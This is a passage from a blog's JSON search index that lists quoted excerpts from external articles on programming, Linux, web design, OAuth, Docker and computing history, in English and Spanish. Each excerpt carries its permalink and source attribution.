href=\"https://www.meneame.net/story/recordais-paper-sobre-agujeros-negros-llego-portada-flipo-tanto-1\"\u003emeneame.net\u003c/a\u003e\u003c/p\u003e","title":"¿Recordáis el paper sobre agujeros negros que llegó a portada? He programado una simulación"},{"content":" Python automatically concatenates adjacent string literals thanks to implicit string concatenation. This feature can sometimes lead to bugs.\n» Trey Hunner | pythonmorsels.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/02/implicit-string-concatenation/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePython automatically concatenates adjacent string literals thanks to\nimplicit string concatenation. This feature can sometimes lead to bugs.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Trey Hunner | \u003ca href=\"https://www.pythonmorsels.com/implicit-string-concatenation/\"\u003epythonmorsels.com\u003c/a\u003e\u003c/p\u003e","title":"Implicit string concatenation"},{"content":" A framework for debugging microservices using gRPC interceptors to automatically collect and propagate debug information across service calls.\n» HackerNoon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/01/debugging-microservices-a-journey-into-distributed-debugging-hackernoon/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA framework for debugging microservices using gRPC interceptors to\nautomatically collect and propagate debug information across service\ncalls.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» HackerNoon | \u003ca href=\"https://hackernoon.com/debugging-microservices-a-journey-into-distributed-debugging\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"Debugging Microservices: A Journey into Distributed Debugging | HackerNoon"},{"content":" El consultor José Miguel Bolívar (@jmbolivar) clasifica los comportamientos productivos en cuatro niveles:\nEficacia es prestar atención a las cosas correctas. Eficiencia es prestar la atención correcta a cada cosa. Efectividad es prestar la atención correcta a las cosas correctas. Equilibrio es prestar la atención adecuada a todas las cosas. Tal vez no muchos directivos y profesionales puedan asegurar que están siquiera en el nivel 1 de productividad, es decir, que están prestando atención a las “cosas correctas”, porque para poder hacerlo, antes hay que decidir de forma específica cuáles son ahora los objetivos correctos en su empresa y/o en su carrera. » Alfonso Alcántara | blogthinkbig.com\n","permalink":"http://karpoke.ignaciocano.com/2019/12/26/una-sola-pregunta-para-mejorar-tu-carrera-profesional-en-2020/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl consultor José Miguel Bolívar (@jmbolivar) clasifica los comportamientos\nproductivos en cuatro niveles:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEficacia es prestar atención a las cosas correctas.\u003c/li\u003e\n\u003cli\u003eEficiencia es prestar la atención correcta a cada cosa.\u003c/li\u003e\n\u003cli\u003eEfectividad es prestar la atención correcta a las cosas correctas.\u003c/li\u003e\n\u003cli\u003eEquilibrio es prestar la atención adecuada a todas las cosas.\nTal vez no muchos directivos y profesionales puedan asegurar que están\nsiquiera en el nivel 1 de productividad, es decir, que están prestando\natención a las “cosas correctas”, porque para poder hacerlo, antes hay que\ndecidir de forma específica cuáles son ahora los objetivos correctos en su\nempresa y/o en su carrera.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alfonso Alcántara  | \u003ca href=\"https://empresas.blogthinkbig.com/carrera-profesional/\"\u003eblogthinkbig.com\u003c/a\u003e\u003c/p\u003e","title":"Una sola pregunta para mejorar tu carrera profesional en 2020"},{"content":" There are no definites with color. Sure, you have your red, your green, and so on — but even that is relative. Try to describe a specific red color to a friend. Chances are the description will settle on, for example, is the color more of a brick-red or a fire truck-red? Describing a color that looks similar to another color is natural way to discuss or express color. But when getting into specifics — accurately defining what it a certain color is — it’s almost impossible. Color, at its core, is a relative and personal experience.\n» Christopher Schmitt | 24a11y.com\n","permalink":"http://karpoke.ignaciocano.com/2019/12/26/color-theory-and-contrast-ratios/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere are no definites with color. Sure, you have your red, your green, and\nso on — but even that is relative. Try to describe a specific red color to a\nfriend. Chances are the description will settle on, for example, is the color\nmore of a brick-red or a fire truck-red?\nDescribing a color that looks similar to another color is natural way to\ndiscuss or express color. But when getting into specifics — accurately\ndefining what it a certain color is — it’s almost impossible. Color, at its\ncore, is a relative and personal experience.\u003c/p\u003e","title":"Color Theory and Contrast Ratios"},{"content":" This article doesn’t want to be the final guide to OAuth 2, but an introduction to the flows that this framework is composed of. You’ll have a look at the four basic flows and some practical scenarios, to understand the involved actors and the detailed behaviors. The goal is to be able to choose a flow that best fits your needs. To make it as easy as possible, the experts will forgive me, we can say that there are four different versions. Or, more correctly, four different flows. OAuth 2 is the totality of these flows. It’s not mandatory to implement them all, but only the ones that you need.\n» Lorenzo Spyna | itnext.io\n","permalink":"http://karpoke.ignaciocano.com/2019/12/16/an-oauth-2-0-introduction-for-beginners/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis article doesn’t want to be the final guide to OAuth 2, but an\nintroduction to the flows that this framework is composed of. You’ll have a\nlook at the four basic flows and some practical scenarios, to understand the\ninvolved actors and the detailed behaviors. The goal is to be able to choose\na flow that best fits your needs.\nTo make it as easy as possible, the experts will forgive me, we can say that\nthere are four different versions. Or, more correctly, four different flows.\nOAuth 2 is the totality of these flows. It’s not mandatory to implement them\nall, but only the ones that you need.\u003c/p\u003e","title":"An OAuth 2.0 introduction for beginners"},{"content":" Traditionally, design patterns have been classified into three main categories: Creational, Structural, and Behavioral. There are other categories, like architectural or concurrency patterns, but they\u0026rsquo;re beyond the scope of this article. There are also Python-specific design patterns that are created specifically around the problems that the structure of the language itself provides or that deal with problems in special ways that are only allowed because of the structure of the language.\n» Darinka Zobenica | stackabuse.com\n","permalink":"http://karpoke.ignaciocano.com/2019/12/16/design-patterns-in-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTraditionally, design patterns have been classified into three main\ncategories: Creational, Structural, and Behavioral. There are other\ncategories, like architectural or concurrency patterns, but they\u0026rsquo;re beyond\nthe scope of this article.\nThere are also Python-specific design patterns that are created specifically\naround the problems that the structure of the language itself provides or\nthat deal with problems in special ways that are only allowed because of the\nstructure of the language.\u003c/p\u003e","title":"Design Patterns in Python"},{"content":" CSS Layout is all about boxes. We know that some boxes are blocks, and others are inline, and we can change the display type of elements by changing the value of the display property. That property holds the key to much more than this, however. It is the foundation on which all layout is built; the core of the inbuilt CSS layout system. Learning Grid Layout, or Flexbox, without understanding Display, leaves you with a wobbly foundation and more questions than answers. The real question isn’t “Should I use Grid or Flexbox?” but instead, “How do I want these boxes to behave?” Understanding the interaction between layout methods will enable you to easily create fallbacks for older browsers, and knowing how the various formatting contexts behave unlocks margin collapsing and the behavior of items inside grid or flex layout. By the end of the hour, you’ll understand how the display property underpins the layout system we have today, the things coming in the future, and be able to make more informed decisions when deciding how to build any part of your design, big or small.\n» Rachel Andrew | noti.st\n","permalink":"http://karpoke.ignaciocano.com/2019/12/16/now-you-see-it-understanding-display/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCSS Layout is all about boxes. We know that some boxes are blocks, and others\nare inline, and we can change the display type of elements by changing the\nvalue of the display property. That property holds the key to much more than\nthis, however. It is the foundation on which all layout is built; the core of\nthe inbuilt CSS layout system. Learning Grid Layout, or Flexbox, without\nunderstanding Display, leaves you with a wobbly foundation and more questions\nthan answers.\nThe real question isn’t “Should I use Grid or Flexbox?” but instead, “How do\nI want these boxes to behave?” Understanding the interaction between layout\nmethods will enable you to easily create fallbacks for older browsers, and\nknowing how the various formatting contexts behave unlocks margin collapsing\nand the behavior of items inside grid or flex layout. By the end of the hour,\nyou’ll understand how the display property underpins the layout system we\nhave today, the things coming in the future, and be able to make more\ninformed decisions when deciding how to build any part of your design, big or\nsmall.\u003c/p\u003e","title":"Now You See It: Understanding Display"},{"content":" GRUB (Grand Unified Bootloader) es un gestor de arranque disponible del proyecto GNU. Un gestor de arranque es muy importante ya que es imposible iniciar un sistema operativo sin él. Es el primer programa que se inicia cuando se enciende el ordenador. El cargador de arranque transfiere el control al núcleo del sistema operativo. GRUB es el gestor de arranque predeterminado para casi todas las distribuciones de GNU/Linux. Esto se debe a que es mejor que muchas de las versiones anteriores de los cargadores de arranque. Pero ¿Hay vida más allá de GRUB?\n» Más Linux | maslinux.es\n","permalink":"http://karpoke.ignaciocano.com/2019/11/23/mas-alla-de-grub.md/","summary":"\u003cblockquote\u003e\n\u003cp\u003eGRUB (Grand Unified Bootloader) es un gestor de arranque disponible del\nproyecto GNU. Un gestor de arranque es muy importante ya que es imposible\niniciar un sistema operativo sin él. Es el primer programa que se inicia\ncuando se enciende el ordenador. El cargador de arranque transfiere el\ncontrol al núcleo del sistema operativo.\nGRUB es el gestor de arranque predeterminado para casi todas las\ndistribuciones de GNU/Linux. Esto se debe a que es mejor que muchas de las\nversiones anteriores de los cargadores de arranque. Pero ¿Hay vida más allá\nde GRUB?\u003c/p\u003e","title":"Más allá de GRUB"},{"content":" This is mainstream opinion. Linux is better than anything else and money is poured in constantly, more than in other platforms. And aside this is not true, this is not based in facts but on feelings. Most GNU/Linux distributions are very average on many aspects. The fact they run on many servers on this planet and many developers work on them, doesn’t make them better than ‘X’. They are popular but that’s it.\n» Albert Valbuena | adminbyaccident.com\n","permalink":"http://karpoke.ignaciocano.com/2019/11/23/linux-vs-open-source-unix/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is mainstream opinion. Linux is better than anything else and money is\npoured in constantly, more than in other platforms. And aside this is not\ntrue, this is not based in facts but on feelings. Most GNU/Linux\ndistributions are very average on many aspects. The fact they run on many\nservers on this planet and many developers work on them, doesn’t make them\nbetter than ‘X’. They are popular but that’s it.\u003c/p\u003e","title":"Linux VS open source UNIX"},{"content":" Since the 1970’s, Vi and its successor Vim have been included by default on many operating systems, including almost all GNU/Linux distributions. Vim is free and open-source and is one of the most popular code editors. It can be downloaded on Vim official site.\n» Jean-Baptiste Jung | catswhocode.com\n","permalink":"http://karpoke.ignaciocano.com/2019/11/23/130-vim-essential-vim-commands.md/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSince the 1970’s, Vi and its successor Vim have been included by default on\nmany operating systems, including almost all GNU/Linux distributions. Vim is\nfree and open-source and is one of the most popular code editors. It can be\ndownloaded on Vim official site.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jean-Baptiste Jung | \u003ca href=\"https://catswhocode.com/vim-commands/\"\u003ecatswhocode.com\u003c/a\u003e\u003c/p\u003e","title":"130+ Essential Vim Commands"},{"content":" The vast majority of PC users today have no memory of what PC keyboards looked like before the standard 101/102-key layout arrived, even though various OEMs do their best to mangle the standard layout in order to minimize usability, especially on laptops. OEM-specific modifications aside, the basic layout of the main block of alphanumeric keys has not changed in over 30 years, since 1986.\nHowever, up until that point the PC keyboard layout and the keyboard hardware changed quite a bit, and looking at the 1981-1986 IBM Technical References is key to understanding a) why the standard keyboard scan codes are so complex, and b) why there are so many seemingly odd vendor-specific modifications of the standard layout.\n» OS/2 Museum | os2museum.com\n","permalink":"http://karpoke.ignaciocano.com/2019/10/27/pc-keyboard-the-first-five-years/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe vast majority of PC users today have no memory of what PC keyboards\nlooked like before the standard 101/102-key layout arrived, even though\nvarious OEMs do their best to mangle the standard layout in order to minimize\nusability, especially on laptops. OEM-specific modifications aside, the basic\nlayout of the main block of alphanumeric keys has not changed in over 30\nyears, since 1986.\u003c/p\u003e\n\u003cp\u003eHowever, up until that point the PC keyboard layout and the keyboard hardware\nchanged quite a bit, and looking at the 1981-1986 IBM Technical References is\nkey to understanding a) why the standard keyboard scan codes are so complex,\nand b) why there are so many seemingly odd vendor-specific modifications of\nthe standard layout.\u003c/p\u003e","title":"PC Keyboard: The First Five Years"},{"content":" A collection of awesome Algorithms books which should find a place in every programmer’s book self. Includes language specific books in Java, Python, and JavaScript for easy learning. Algorithms are language agnostic and any programmer worth their salt should be able to convert them to code in their programming language of choice.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2019/06/21/10-data-structure-amp-algorithms-books-every-programmer-should-read/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA collection of awesome Algorithms books which should find a place in every\nprogrammer’s book self. Includes language specific books in Java, Python,\nand JavaScript for easy learning. Algorithms are language agnostic and any\nprogrammer worth their salt should be able to convert them to code in their\nprogramming language of choice.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-data-structure-algorithms-books-every-programmer-should-read-d50487313127?source=rss----3a8144eabfe3---4\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Data Structure \u0026amp; Algorithms Books Every Programmer Should Read"},{"content":" What is the framework Regardless of the sphere you work in, one of your most important tasks is to create a fast, good-looking website. Today, almost every business needs a website, which acts as a sort of business card for a company or online service. It helps you engage with customers, promote your business, increase sales and so on.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2019/05/28/10-popular-websites-built-with-django/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat is the framework Regardless of the sphere you work in, one of your most\nimportant tasks is to create a fast, good-looking website. Today, almost\nevery business needs a website, which acts as a sort of business card for a\ncompany or online service. It helps you engage with customers, promote your\nbusiness, increase sales and so on.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-popular-websites-built-with-django-906cc310aa0a\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Popular Websites Built With Django"},{"content":" The Object-Oriented Design Principles are the core of OOP programming, but I have seen most of the Java programmers chasing design patterns like Singleton pattern, Decorator pattern, or Observer pattern, and not putting enough attention on learning Object-oriented analysis and design. It’s important to learn the basics of Object-oriented programming like Abstraction, Encapsulation, Polymorphism and Inheritance. But, at the same time, it’s equally important to know object-oriented design principles.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2019/05/06/10-oop-design-principles-every-programmer-should-know/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe Object-Oriented Design Principles are the core of OOP programming, but I\nhave seen most of the Java programmers chasing design patterns like\nSingleton pattern, Decorator pattern, or Observer pattern, and not putting\nenough attention on learning Object-oriented analysis and design. It’s\nimportant to learn the basics of Object-oriented programming like\nAbstraction, Encapsulation, Polymorphism and Inheritance. But, at the same\ntime, it’s equally important to know object-oriented design principles.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-oop-design-principles-every-programmer-should-know-f187436caf65?source=rss----3a8144eabfe3---4\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 OOP Design Principles Every Programmer Should Know"},{"content":" In August 2018, Opensource.com posted a poll with seven options asking readers: What was the most important moment in the history of Linux? I thought I would expand on the list and present 10 moments that I think have played an important part in shaping the history of Linux.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2019/04/30/10-moments-that-shaped-linux-history/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn August 2018, Opensource.com posted a poll with seven options asking\nreaders: What was the most important moment in the history of Linux? I\nthought I would expand on the list and present 10 moments that I think have\nplayed an important part in shaping the history of Linux.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/19/4/top-moments-linux-history\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"10 moments that shaped Linux history"},{"content":" A ojos de alguien no-experto en matemáticas, el arco que encabeza estas líneas puede transmitir una gran armonía, pero resultaría difícil explicar el por qué. La causa de esa armonía está en las matemáticas empleadas para su diseño, para una composición extraordinariamente calculada. Este arco en concreto es el arco del mihrab islámico cordobés del granadino palacio de la Madraza, un lugar que indica hacia qué dirección se debe rezar según la religión musulmana. Si nos fijamos, los arcos interior y exterior no son concéntricos, es decir, no comparten el mismo eje. El arco interior está elevado R/2 por encima del eje de impostas, y el arco exterior elevado un R/5.\n» Xataka | xataka.com\n","permalink":"http://karpoke.ignaciocano.com/2019/04/01/un-paseo-matematico-por-la-alhambra-cuando-el-arte-se-basa-en-los-numeros/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA ojos de alguien no-experto en matemáticas, el arco que encabeza estas\nlíneas puede transmitir una gran armonía, pero resultaría difícil explicar\nel por qué. La causa de esa armonía está en las matemáticas empleadas para\nsu diseño, para una composición extraordinariamente calculada.\nEste arco en concreto es el arco del mihrab islámico cordobés del granadino\npalacio de la Madraza, un lugar que indica hacia qué dirección se debe rezar\nsegún la religión musulmana. Si nos fijamos, los arcos interior y exterior\nno son concéntricos, es decir, no comparten el mismo eje. El arco interior\nestá elevado R/2 por encima del eje de impostas, y el arco exterior elevado\nun R/5.\u003c/p\u003e","title":"Un paseo matemático por la Alhambra: cuando el arte se basa en los números"},{"content":" Software development is an amazing job that can sometimes feel like juggling chainsaws. Between maintaining your current code base and releasing new features and projects, it is fairly easy to think of security as Someone Else\u0026rsquo;s Problem \u0026ndash;you have enough to deal with. But there is a major benefit to incorporating security consciousness into your workflow.\n» DEV Community | dev.to\n","permalink":"http://karpoke.ignaciocano.com/2019/03/03/10-awesome-security-tips-for-python-enthusiasts/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSoftware development is an amazing job that can sometimes feel like juggling\nchainsaws. Between maintaining your current code base and releasing new\nfeatures and projects, it is fairly easy to think of security as Someone\nElse\u0026rsquo;s Problem \u0026ndash;you have enough to deal with. But there is a major benefit\nto incorporating security consciousness into your workflow.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» DEV Community | \u003ca href=\"https://dev.to/hayleydenb/10-awesome-security-tips-for-python-enthusiasts-3729\"\u003edev.to\u003c/a\u003e\u003c/p\u003e","title":"10 Awesome Security Tips for Python Enthusiasts"},{"content":" In this article, we will share a number of cool command-line programs that you can use in a Linux terminal. By the end of this article, you will learn about some free, open source, and exciting, text-based tools to help you do more with boredom on the Command line.\n» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | tecmint.com\n","permalink":"http://karpoke.ignaciocano.com/2019/02/03/10-cool-command-line-tools-for-your-linux-terminal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this article, we will share a number of cool command-line programs that\nyou can use in a Linux terminal. By the end of this article, you will learn\nabout some free, open source, and exciting, text-based tools to help you do\nmore with boredom on the Command line.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | \u003ca href=\"https://www.tecmint.com/cool-linux-commandline-tools-for-terminal/\"\u003etecmint.com\u003c/a\u003e\u003c/p\u003e","title":"10 Cool Command Line Tools For Your Linux Terminal"},{"content":" This post is the first in series of showcases of some of the best non-standard command line tools I\u0026rsquo;ve discovered in recent years. If you ever make use of the command line, you\u0026rsquo;ll probably find that at least one item on this page will make your life easier.\n» DEV Community | dev.to\n","permalink":"http://karpoke.ignaciocano.com/2019/01/04/10-tools-to-power-up-your-command-line/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis post is the first in series of showcases of some of the best\nnon-standard command line tools I\u0026rsquo;ve discovered in recent years. If you ever\nmake use of the command line, you\u0026rsquo;ll probably find that at least one item on\nthis page will make your life easier.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» DEV Community | \u003ca href=\"https://dev.to/_darrenburns/10-tools-to-power-up-your-command-line-4id4\"\u003edev.to\u003c/a\u003e\u003c/p\u003e","title":"10 Tools To Power Up Your Command Line"},{"content":" 10 myths about Microservices, that we often hear to believe it is true. Micro-services has become a very hot topic in the last half-decade. After Agile, DevOps, its Microservices that we hear everywhere I go. The unfortunate thing that I witnessed though, is that, every organization and every person in that organization has their own definition of what a Microservice is.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/12/25/10-myths-about-microservices/","summary":"\u003cblockquote\u003e\n\u003cp\u003e10 myths about Microservices, that we often hear to believe it is true.\nMicro-services has become a very hot topic in the last half-decade. After\nAgile, DevOps, its Microservices that we hear everywhere I go. The\nunfortunate thing that I witnessed though, is that, every organization and\nevery person in that organization has their own definition of what a\nMicroservice is.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-myths-about-microservices-aadd06782260\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Myths About Microservices"},{"content":" Los argumentos universales son los relatos o situaciones dramáticas que se repiten en todas las culturas, épocas y formatos. Se repiten una y mil veces en el cine, el teatro, la literatura, la televisión, el videojuego\u0026hellip; George Polti en su libro clásico \u0026ldquo;Las 36 situaciones dramáticas\u0026rdquo; redujo toda posible acción teatral en 36 paradigmas. En \u0026ldquo;La semilla inmortal. Los argumentos universales en el cine\u0026rdquo;, los autores Jordi Balló y Xavier Pérez sostienen que en el cine hay 21 argumentos que se repiten continuamente. En dicho libro proponen un recorrido por las grandes películas de la historia del cine relacionando los argumentos con obras maestras de la literatura. Cada uno de los 21 capítulos del libro comienza con la explicación de un argumento original para después explicar cómo el cine toma las constantes de dicho argumento y las desarrolla por múltiples vías pero manteniendo siempre la estructura del relato original.\n» David Esteban Cubero | cursosdeguion.com\n","permalink":"http://karpoke.ignaciocano.com/2018/12/18/que-son-los-argumentos-universales/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLos argumentos universales son los relatos o situaciones dramáticas que se\nrepiten en todas las culturas, épocas y formatos. Se repiten una y mil veces\nen el cine, el teatro, la literatura, la televisión, el videojuego\u0026hellip;\nGeorge Polti en su libro clásico \u0026ldquo;Las 36 situaciones dramáticas\u0026rdquo; redujo toda\nposible acción teatral en 36 paradigmas.\nEn \u0026ldquo;La semilla inmortal. Los argumentos universales en el cine\u0026rdquo;, los autores\nJordi Balló y Xavier Pérez sostienen que en el cine hay 21 argumentos que se\nrepiten continuamente. En dicho libro proponen un recorrido por las grandes\npelículas de la historia del cine relacionando los argumentos con obras\nmaestras de la literatura. Cada uno de los 21 capítulos del libro comienza\ncon la explicación de un argumento original para después explicar cómo el\ncine toma las constantes de dicho argumento y las desarrolla por múltiples\nvías pero manteniendo siempre la estructura del relato original.\u003c/p\u003e","title":"¿Qué son los argumentos universales?"},{"content":" Developing with docker containers is great! And we at uilicious run our entire backend on top of docker. It would have been impossible to have launch uilicious at our current cost and scale without docker. However as with all technologies, there are hidden, not so obvious, gotcha’s reaching there, especially when running Docker at scale across multiple hosts. Especially for those migrating from physical servers, or virtualized machines workload.\n» DEV Community | dev.to\n","permalink":"http://karpoke.ignaciocano.com/2018/11/20/5-fatal-docker-gotcha-s-for-new-users/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDeveloping with docker containers is great! And we at uilicious run our\nentire backend on top of docker. It would have been impossible to have\nlaunch uilicious at our current cost and scale without docker. However as\nwith all technologies, there are hidden, not so obvious, gotcha’s reaching\nthere, especially when running Docker at scale across multiple hosts.\nEspecially for those migrating from physical servers, or virtualized\nmachines workload.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» DEV Community | \u003ca href=\"https://dev.to/uilicious/5-fatal-docker-gotchas----for-new-users-2o87\"\u003edev.to\u003c/a\u003e\u003c/p\u003e","title":"5 Fatal Docker Gotcha's 😱 - for new users"},{"content":" Sus inicios coincidieron con el Sistema 360 de IBM, máquinas que andaban por las universidades en los 70 curiosamente «un tanto desocupados» porque la gente no sabía muy bien qué hacer con ellos. Pike aprendió allí a programar. Luego tuvo acceso a un PDP-11 en la universidad de Toronto y a otras máquinas. Cuando llegó a los los laboratorios Bell se encontró con el Unix recién nacido y trabajó con Ken Thompson y con Kernighan y Ritchie, creadores del lenguaje C.\n» Microsiervos | microsiervos.com\n","permalink":"http://karpoke.ignaciocano.com/2018/11/11/la-historia-del-sistema-operativo-unix-y-los-ordenadores-de-la-epoca-narrada-por-rob-pike/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSus inicios coincidieron con el Sistema 360 de IBM, máquinas que andaban por\nlas universidades en los 70 curiosamente «un tanto desocupados» porque la\ngente no sabía muy bien qué hacer con ellos. Pike aprendió allí a programar.\nLuego tuvo acceso a un PDP-11 en la universidad de Toronto y a otras\nmáquinas. Cuando llegó a los los laboratorios Bell se encontró con el Unix\nrecién nacido y trabajó con Ken Thompson y con Kernighan y Ritchie,\ncreadores del lenguaje C.\u003c/p\u003e","title":"La historia del sistema operativo Unix y los ordenadores de la época narrada por Rob Pike"},{"content":" Many junior developers dream of making it at one of the larger tech companies, but, to be honest with you, getting your first job is never easy. It is, in fact, one of the hardest things in your life and you need to put your best effort to find a job in your dream company.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/10/26/10-data-structure-algorithms-and-programming-courses-to-crack-any-coding-interview/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMany junior developers dream of making it at one of the larger tech\ncompanies, but, to be honest with you, getting your first job is never easy.\nIt is, in fact, one of the hardest things in your life and you need to put\nyour best effort to find a job in your dream company.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-data-structure-algorithms-and-programming-courses-to-crack-any-coding-interview-e1c50b30b927\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Data Structure, Algorithms, and Programming Courses to Crack Any Coding Interview"},{"content":" The root account is the ultimate account on a Linux and other Unix-like operating systems. This account has access to all commands and files on a system with full read, write and execute permissions. It is used to perform any kind of task on a system; to create/update/access/delete other users’ accounts, install/remove/upgrade software packages, and so much more.\n» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | tecmint.com\n","permalink":"http://karpoke.ignaciocano.com/2018/10/21/4-ways-to-disable-root-account-in-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe root account is the ultimate account on a Linux and other Unix-like\noperating systems. This account has access to all commands and files on a\nsystem with full read, write and execute permissions. It is used to perform\nany kind of task on a system; to create/update/access/delete other users’\naccounts, install/remove/upgrade software packages, and so much more.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | \u003ca href=\"https://www.tecmint.com/disable-root-login-in-linux/\"\u003etecmint.com\u003c/a\u003e\u003c/p\u003e","title":"4 Ways to Disable Root Account in Linux"},{"content":" Have you ever amazed to see someone working very fast in UNIX, firing commands and doing things quickly? Yes, I have seen that a couple of times and It has always inspired me inspired to learn from those superstar developers. In this article, or tutorial, or whatever you call it, I have shared some UNIX command practices I follow to work fast, quick, or efficiently in Linux.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/10/18/10-basic-tips-on-working-fast-in-unix-or-linux-terminal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHave you ever amazed to see someone working very fast in UNIX, firing\ncommands and doing things quickly? Yes, I have seen that a couple of times\nand It has always inspired me inspired to learn from those superstar\ndevelopers. In this article, or tutorial, or whatever you call it, I have\nshared some UNIX command practices I follow to work fast, quick, or\nefficiently in Linux.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-basic-tips-on-working-fast-in-unix-or-linux-terminal-5746ae42d277\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Basic Tips on Working Fast in UNIX or Linux Terminal"},{"content":" Hello Guys, React or React JS is a JavaScript front-end library from Facebook which lets you create HTML based GUI. It makes the task easier by providing a component-based architecture which was only available to languages like Java and C# before. Because of this awesome feature, React is quickly becoming the standard JavaScript library for developing front-end. That’s the reason many programmers and developers are learning React or React JS.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/10/06/10-react-js-articles-every-web-developer-should-read/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHello Guys, React or React JS is a JavaScript front-end library from Facebook\nwhich lets you create HTML based GUI. It makes the task easier by providing a\ncomponent-based architecture which was only available to languages like Java\nand C# before. Because of this awesome feature, React is quickly becoming the\nstandard JavaScript library for developing front-end. That’s the reason many\nprogrammers and developers are learning React or React JS.\u003c/p\u003e","title":"10 React JS Articles Every Web Developer Should Read"},{"content":" I’ve often seen people suggest that you should learn C in order to learn how computers work. Is this a good idea? Is this accurate? I’m going to start with my conclusion right upfront, just to be crystal clear about what I’m saying here:\nC is not “how the computer works.” I don’t think most people mean this phrase literally, so that is sort of irrelevant. Understanding the context means that learning C for this reason may still be a good idea for you, depending on your objectives. » Steve Klabnik | steveklabnik.com\n","permalink":"http://karpoke.ignaciocano.com/2018/10/04/should-you-learn-c-to-learn-how-the-computer-works/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve often seen people suggest that you should learn C in order to learn how\ncomputers work. Is this a good idea? Is this accurate? I’m going to start\nwith my conclusion right upfront, just to be crystal clear about what I’m\nsaying here:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eC is not “how the computer works.”\u003c/li\u003e\n\u003cli\u003eI don’t think most people mean this phrase literally, so that is sort of\nirrelevant.\u003c/li\u003e\n\u003cli\u003eUnderstanding the context means that learning C for this reason may still\nbe a good idea for you, depending on your objectives.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Steve Klabnik | \u003ca href=\"https://words.steveklabnik.com/should-you-learn-c-to-learn-how-the-computer-works\"\u003esteveklabnik.com\u003c/a\u003e\u003c/p\u003e","title":"Should you learn C to “learn how the computer works”?"},{"content":" El día 23 de septiembre de 2008 es una fecha marcada para Google en el calendario, ese día se presentó al público la versión 1.0 de Android. Un sistema que, aunque parece llevar con nosotros desde siempre, cumple hoy diez años. Nada más y nada menos. Aunque su desarrollo empezó varios años antes de 